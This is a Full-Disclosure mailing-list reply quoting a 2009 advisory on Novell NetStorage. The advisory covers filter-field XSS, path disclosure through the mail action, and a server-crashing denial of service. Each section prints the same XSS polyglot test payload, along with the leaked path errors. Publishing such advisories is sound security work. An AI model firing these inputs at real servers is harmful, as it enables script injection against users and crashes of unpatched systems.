I like you name, hehe. On Thu, Mar 26, 2009 at 8:50 PM, Bugs NotHugs <bugsnoth...@gmail.com> wrote: > - Novell Netstorage Multiple Vulnerabilities > > - Description > > "Novell NetStorage acts as a bridge between a company's protected Novell > network > and the Internet, providing protected file access from any Internet > location. Files > and folders on a Novell NetWare® 6.5 server or Novell Open Enterprise > Server can be > accessed using either a browser or via Network Neighborhood and Microsoft Web > Folders; no Novell Client^Ù software is required. Users can securely > access files > from any IP-enabled machine via Secure Sockets Layer (SSL) and Secure > Hypertext > Transfer Protocol (HTTPS)." > > Novell NetStorage contains a wide variety of vulnerabilities that may > allow an attacker > to cause a denial of service, gain configuration information or exploit other > users of the application. > > #1 - Filter Field XSS > > The 'filter' field does not sanitize user-supplied input. An attacker > could use this > to carry out cross-site scripting attacks against other authenticated users. > > ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--> > </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> > > #2 - Mail File Action Path Disclosure > > On a file list, if a user right clicks a file, chooses the 'mail' > option and then > pastes script code in any field, the application will produce an error message > disclosing the installation path: > > Paste the following script: > > ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->< > /SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> > > Resulting error: > > OES: > 'file:/var/opt/novell/novlwww/email.xsl': (1): mismatched end tag: > expected "to" but got "SCRIPT" > > Netware: > 'file:/SYS:/tomcat/4/email.xsl': (1): mismatched end tag: expected > "subject" but got "SCRIPT" > > #3 - File Attribute Malformed Input Server DoS > > When interacting with files, a user can right click on the file and click > either 'NFS Info' or 'Netware Info'. Supplying script code into various fields > will cause the Netware server to abend and lock up. > > Note: This was only tested on version 2.0.1 on netware 6.5 SP6, not OES. > > The following script code causes the issue: > > ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->< > /SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> > > - Product > > Novell Inc., Netstorage, 3.1.5-19 on OES - 2.0.1 on netware 6.5 SP6 > > - Solution > > None > > - Timeline > > 2008-06-06: Vulnerability Discovered > 2008-07-07: Disclosed to Vendor (no ack) > 2008-10-05: Re-sent to Vendor (no ack) > 2009-03-26: Disclosed to Public (no more playing nice) > > -- > > BugsNotHugs > Shared Vulnerability Disclosure Account > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/